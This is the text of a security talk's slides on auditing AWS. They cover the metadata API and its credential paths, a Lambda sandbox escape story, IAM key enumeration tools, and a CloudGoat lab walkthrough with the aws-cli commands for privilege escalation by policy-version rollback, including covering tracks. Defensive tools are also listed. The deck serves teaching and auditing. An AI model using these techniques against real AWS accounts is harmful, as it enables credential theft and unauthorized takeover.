DOING AWS

ZOO AUDIT

Denis Rybin@_ttffdd_

WHY?

2

Why?

• AWS has small coverage in the Russian IS community

• The most frequent question is, “I knock the metadata API, but can’t understand anything there.”

• False confidence in AWS being vulnerable to nothing but public S3 andSSRF to metadata API.

• Curiosity

3

What?• 30-45 min. of mish-mash

• Level: “introduction and selected aspects”

The talk DOES cover:

• AWS for 5 minutes or so

• AWS for a bughunter

• AWS for an auditor

• Helpful tips and tricks

What?• 30-45 min. of mish-mash

• Level: “introduction and selected aspects”

The talk DOESN’T cover:

• AWS EKS

• Google Compute Engine

• Microsoft Azure

• Anything interesting

WHAT IS AWS?A bunch of services

6

Simple and

intuitive

EC2, you’ve surely heard about it:

• A ready virtual server

• Equipped with virtual metadata API

• May be furnished with a user data script

• A part of the AWS ecosystem.

• Connected to VPC

Two words about VPC

VPC is a key AWS network unit:

• Subnetworks/IP

• Subnetworks and gateways

• Security GroupAWSVPC

Simple and

intuitive

Metadata API:

[ec2-user ~]$ curl http://169.254.169.254/

1.0

2012-01-12

2014-02-25

2014-11-05

2015-10-20

2016-04-19

2016-06-30

2016-09-02

latest

Simple and

intuitiveUser data and metadata sensitive part:

• http://169.254.169.254/latest/user-data

• http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

Fun fact about

metadata APIGoogle Cloud

• Header "Metadata-Flavor: Google" Required

Azure

• Header "Metadata: true" Required

AWS

• No Header Required

Dirty fix

https://github.com/stefansundin/ec2-metadata-filter

The program blocks any request with a User-

Agent that does not start with one of the

following prefixes:

aws-chalice/

aws-cli/

aws-sdk-

Boto3/

Botocore/

Cloud-Init/

Dirty fix

https://github.com/stefansundin/ec2-metadata-filter

In addition to whitelisting User-Agent

prefixes, the program also allows

requests that send the header

Metadata-Flavor: Amazon.

Dirty fix

https://github.com/stefansundin/ec2-metadata-filter

Like GCE, the program blocks requests

containing an X-Forwarded-For header.

COOOOOL STORY TIME

A story by @ninjazerooneabout

functionshieldAWS

Lambda

COOOOOL STORY TIME

COOOOOL STORY TIME

Context: There is a python sandbox with code execution. The code in it is executed for data processing, big data, etc.

We post python code in a website form → the code is parsed and ran on AWS Lambda.

AWSLambda

COOOOOL STORY TIME This is where the library jumps into

action. It serves 4 major tasks:

1. To block all tcp connections (udparen’t blocked)

2. Restrict all child processes

3. Forbids read/write to tmp

4. Forbids reading a handler script that contains the biggest amount of code

AWSLambda

COOOOOL STORY TIME

AWSLambda

COOOOOL STORY TIME

So everything, but read/write to tmp,

wasn’t allowed for us.

AWSLambda

COOOOOL STORY TIME

Было запрещено всё, кроме

читать/писать в tmp.

AWSLambda

COOOOOL STORY TIME

Было запрещено всё, кроме

читать/писать в tmp.

AWSLambda

COOOOOL STORY TIME

AWSLambda

COOOOOL STORY TIME

The more the merrier:

• The mechanism of blocking tmp on a

syscall blacklist

• Let’s look for something out of the

blacklistAWS

Lambda

COOOOOL STORY TIME

And we managed to find it:

• Read and write are forbidden

• Rename is NOTAWS

Lambda

WIN-WIN-WINBACK TO AWS…

26

Simple and

intuitive

Quite often, user data is a script executed when an

instance is ran.

For example:#!/bin/bash

yum update -y

amazon-linux-extras install -y lamp-mariadb10.2-php7.2 php7.2

yum install -y httpd mariadb-server

systemctl start httpd

systemctl enable httpd

usermod -a -G apache ec2-user

chown -R ec2-user:apache /var/www

chmod 2775 /var/www

find /var/www -type d -exec chmod 2775 {} \;

find /var/www -type f -exec chmod 0664 {} \;

echo "<?php phpinfo(); ?>" > /var/www/html/phpinfo.php

Pretty important

AWS Security Credentials

Access keys consist of two parts:

• an access key ID (for example, AKIAIOSFODNN7EXAMPLE)

• a secret access key (for example, wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY).AWS

IAM

Pretty important

The key to what?

There are 2 options to find out:

• Ask AWS directly and get screwed

• Bruteforce

AWSIAM

Pretty important The key to what?

There are 2 options to find out:

• https://github.com/elitest/RedDolphin/blob/master/checkAWSKey.py

• https://github.com/andresriancho/enumerate-iam

AWSIAM

Pretty important

https://github.com/elitest/RedDolphin/blob/master/checkAWSKey.py for those who prefer asking

AWSIAM

Pretty important

https://github.com/andresriancho/enumerate-iam time-consuming

AWSIAM

Pretty important

https://github.com/andresriancho/enumerate-iam time-consuming

AWSIAM

AWS101

ARN default format:

• arn:partition:service:region:account-id:resource-id

• arn:partition:service:region:account-id:resource-type/resource-id

• arn:partition:service:region:account-id:resource-type:resource-id

Example:

• arn:aws:iam::123456789012:user/Development/product_1234/*

AWScore

AWS101

Try guessing what the config does? Get the prize!

AWScore

AWS101

Try guessing what the config does? Get the prize!

AWScore

AWS101

Dungeon and dragons

Users and policies

AWScore

AWS101

Users:

• The AWS Account Root User

• IAM Users

• IAM Groups

• IAM RolesAWScore

AWS101

Policies:

• Identity-based policies • Managed policies

• Inline policies

• Resource-based policies AWScore

Escalation case

Escalation case from CloudGoat

Here is a simple case - iam_privesc_by_rollback

CloudGoat

Route Walkthrough - IAM User "Raynor"

1. Starting as the IAM user "Raynor,"

the attacker has only a few limited -

seemingly harmless - privileges

available to them.CloudGoat

Escalation case

Route Walkthrough - IAM User "Raynor"

2. The attacker analyzes Raynor's

privileges and notices the

SetDefaultPolicyVersion permission -

allowing access to 4 other versions of

the policy via setting an old version as

the default.CloudGoat

Escalation case

Route Walkthrough - IAM User "Raynor"

3. After reviewing the old policy

versions, the attacker finds that one

version in particular offers a full set of

admin rights.CloudGoat

Escalation case

Route Walkthrough - IAM User "Raynor"

4. Attacker restores the full-admin policy

version, gaining full admin privileges

and the ability to carry out any

malicious actions they wish.CloudGoat

Escalation case

Route Walkthrough - IAM User "Raynor"

5. As a final step, the attacker may

choose to revert Raynor's policy version

back to the original one, thereby

concealing their actions and the true

capabilities of the IAM user.CloudGoat

Escalation case

Route Walkthrough - IAM User "Raynor"

1. Starting as the IAM user "Raynor," the attacker has only a few limited - seemingly harmless - privileges available to them.

2. The attacker analyzes Raynor's privileges and notices the SetDefaultPolicyVersion permission - allowing access to 4 other versions of the policy via setting an old version as the default.

3. After reviewing the old policy versions, the attacker finds that one version in particular offers a full set of admin rights.

4. Attacker restores the full-admin policy version, gaining full admin privileges and the ability to carry out any malicious actions they wish.

5. As a final step, the attacker may choose to revert Raynor's policy version back to the original one, thereby concealing their actions and the true capabilities of the IAM user.

CloudGoat

Escalation case

AWS-CLI Walkthrough - IAM User «Raynor»

1. aws configure --profile raynor

2. aws iam list-attached-user-policies --user-name raynor --profile Raynor

3. aws iam list-policy-versions --policy-arn<generatedARN>/cg-raynor-policy --profile Raynor

4. aws iam get-policy-version --policy-arn<generatedARN>/cg-raynor-policy --version-id <versionID> --profile Raynor

5. aws iam set-default-policy-version --policy-arn<generatedARN>/cg-raynor-policy --version-id <versionID> --profile Raynor

CloudGoat

AWS-CLIIn action

Pretty important Escalation will be addressed later

But here is a couple of helpful links!

• https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation - 28 (!!!) techniques

• https://github.com/RhinoSecurityLabs/pacu- метасплоит мира AWS

AWSIAM

Best first step

ScoutSuite

Details

ScoutSuite

MOREDetails

ScoutSuite

What you need for

audit?

ScoutSuite

Permissions

The following AWS Managed Policies can be attached to the principal used to run Scout in order to grant the necessary permissions:

• ReadOnlyAccess

• SecurityAudit

You will also find a custom policy to run Scout

with minimal privileges here.

AWS Bloodhound

Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.

Lyftcartography

AWS Bloodhound

Lyftcartography

OK, LAST PARTTWO GREAT CASES

55

COGNITOcase

The service allows for assigning limited rights to users in your AWS account.

The purpose of the service:

• Obtain identity ID

• Pass AWS Credentials

The service is used by mobile apps and websites

AWScognito

COGNITOcase

Q: Could obtained rights be unsafe?

A: Sure)

AWScognito

COGNITOcase

Original research:

internet-scale-analysis-of-aws-cognito-security

AWScognito

EBS case

AWSEBS

Amazon Elastic Block Store (EBS) – is a simple-to-use, highly performant cloud storage service designed to be used in combination with Amazon ElasticCompute Cloud (EC2).

EBS case

AWSEBS

It can be:

• Public/Private

• Encrypted/Non-encrypted

EBS case

AWSEBS

Q: Can public non-encrypted disks contain secrets?

A: Sure they can)

EBS case

AWSEBS

Original research:

Finding Secrets In Publicly Exposed EBS Volumes - Ben Morris

nehochy(Oh, come on:

• http://flaws.cloud/

• https://github.com/EdOverflow/can-i-take-over-xyz

• Hundreds of BB cases, thousands of articles on the same topAWS

S3

For defense

Asecurecloud

A

RESOURCES• AWS EC2 Security Strategy Guide

https://asecure.cloud/g/strategy_ec2_security/

• API Keys Now WhatTaking the Pen Test Into the Amazon Cloud Jim Shave

https://www.youtube.com/watch?v=vV7xN2JQNOU

• Finding Secrets In Publicly Exposed EBS Volumes - Ben Morris

https://www.youtube.com/watch?v=-LGR63yCTts

• CloudGoat

https://github.com/RhinoSecurityLabs/cloudgoat

• Blog RhinoSecurity

https://rhinosecuritylabs.com/blog/

• Blog Andres Riancho

https://andresriancho.com/blog

RESOURCES

Канал куда я планирую постить интересности связанные безопасностью AWS , прочих облаков и может k8s

https://t.me/cloud_sec

@author

THANKS FOR ATTENTION

@_TTFFDD_